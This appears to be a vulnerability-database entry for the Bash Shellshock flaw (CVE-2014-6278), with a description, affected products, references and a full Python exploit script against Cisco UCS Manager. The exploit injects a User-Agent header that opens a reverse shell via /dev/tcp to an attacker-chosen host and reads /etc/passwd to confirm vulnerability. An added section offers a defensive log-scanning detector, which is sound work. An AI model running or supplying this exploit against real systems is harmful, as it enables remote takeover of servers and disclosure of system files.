|Vulnerability Source
https://www.exploit-db.com/exploits/39568
https://www.securityfocus.com/bid/70166
https://cxsecurity.com/issue/WLB-2016030091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201409-1110
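|Vulnerability Details
GNU Bash is a shell (command language interpreter) written by the American software developer Brian J. Fox for the GNU Project. It runs on Unix-like operating systems (it is the default shell on Linux systems), can read and execute commands from standard input or from a file, and also incorporates some features of ksh and csh. A security vulnerability exists in GNU Bash 4.3 and earlier, caused by the program not correctly parsing function definitions in environment variables. A remote attacker can exploit the vulnerability to execute arbitrary commands by means of a specially crafted environment variable. The following products may be affected: the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in Apache HTTP Server, DHCP clients, and others. (The patches GNU released for CNNVD-201409-938, CNNVD-201409-956 and CNNVD-201409-1037 did not completely fix the vulnerability; it is still present in CNNVD-201409-1110.)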
|Vulnerability Exploit (EXP)
#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
#
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory:
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################

import sys
import requests
import time

if len(sys.argv) < 4:
    print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
    print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
    print "[*]"
    print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
    print "[*] Listener: nc -lvp <port>"
    print "\n"
    sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
    'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
}
headers2 = {
    "User-Agent": '() { test;};echo "Content-type: text/plain"; echo; echo; echo $(</etc/passwd)'
}

def exploit():
    try:
        r = requests.get(url, headers=headers1, verify=False, timeout=5)
    except Exception, e:
        if 'timeout' in str(e):
            print "[+] Success. Enjoy your shell..."
        else:
            print "[-] Something is wrong..."
            print "[-] Error: " + str(e)

def main():
    try:
        r = requests.get(url, headers=headers2, verify=False, timeout=3)
        if r.content.startswith('\nroot:'):
            print "[+] Host is vulnerable, spawning shell..."
            time.sleep(3)
            exploit()
        else:
            print "[-] Host is not vulnerable, quitting..."
            sys.exit()
    except Exception, e:
        print "[-] Something is wrong..."
        print "[-] Error: " + str(e)

if __name__ == "__main__":
    main()
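For defenders, the request headers used above leave a recognisable trace in web server access logs. The following is an added detection example, not part of the original exploit or of any vendor tooling: it scans Apache "combined" format log lines for the Bash function-definition marker in the request line, Referer and User-Agent fields. The sample log lines, the `/cgi-bin/status` path and all function and variable names are constructed for illustration.

```python
import re

# Apache "combined" log format; quoted fields may contain backslash-escaped quotes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + '$'
)
# Both User-Agent values in the exploit above begin with the Bash
# function-definition marker "() {"; tolerate extra whitespace in probes.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
FIELDS = ("request", "referer", "user-agent")

# Constructed sample lines (documentation IP ranges, harmless "echo probe" payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Oct/2014:10:00:05 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" '
    '200 44 "-" "() { test;};echo \\"Content-type: text/plain\\"; echo; echo probe"',
    '198.51.100.7 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '500 0 "() { ignored;}; echo probe" "curl/7.38.0"',
]


def scan(lines):
    """Return (line_number, client_ip, field_name) for each suspicious field."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line.strip())
        if match is None:
            continue  # not in combined format; a real tool would count these
        client = match.group(1)
        # Groups 2..4 are the request line, Referer and User-Agent.
        for name, value in zip(FIELDS, match.groups()[1:]):
            if FUNC_DEF.search(value):
                hits.append((number, client, name))
    return hits


if __name__ == "__main__":
    for number, client, name in scan(SAMPLE_LOG):
        print("line %d: %s sent a function definition in %s" % (number, client, name))
```

Only fields that the log format records are covered: a function definition sent in another header, such as Cookie, is invisible to this check unless the server is configured to log that header.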
|Affected Products
Xerox WorkCentre 7245 Xerox WorkCentre 7242 Xerox WorkCentre 7238 Xerox WorkCentre 7235 Xerox WorkCentre 7232 Xerox WorkCentre 7228 Xerox Phaser 7800 0
|References
Source: support.novell.com
Link: http://support.novell.com/security/cve/CVE-2014-6278.html
Source: lcamtuf.blogspot.com
Link: http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
Source: bugzilla.redhat.com
Link: https://bugzilla.redhat.com/show_bug.cgi?id=1147414
Source: SECUNIA
Link: http://secunia.com/advisories/61641
Source: www.suse.com
Link: https://www.suse.com/support/shellshock/
Source: security-tracker.debian.org
Link: https://security-tracker.debian.org/tracker/CVE-2014-6278
Source: kb.bluecoat.com
Link: https://kb.bluecoat.com/index?page=content&id=SA82
Source: lcamtuf.blogspot.com
Link: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html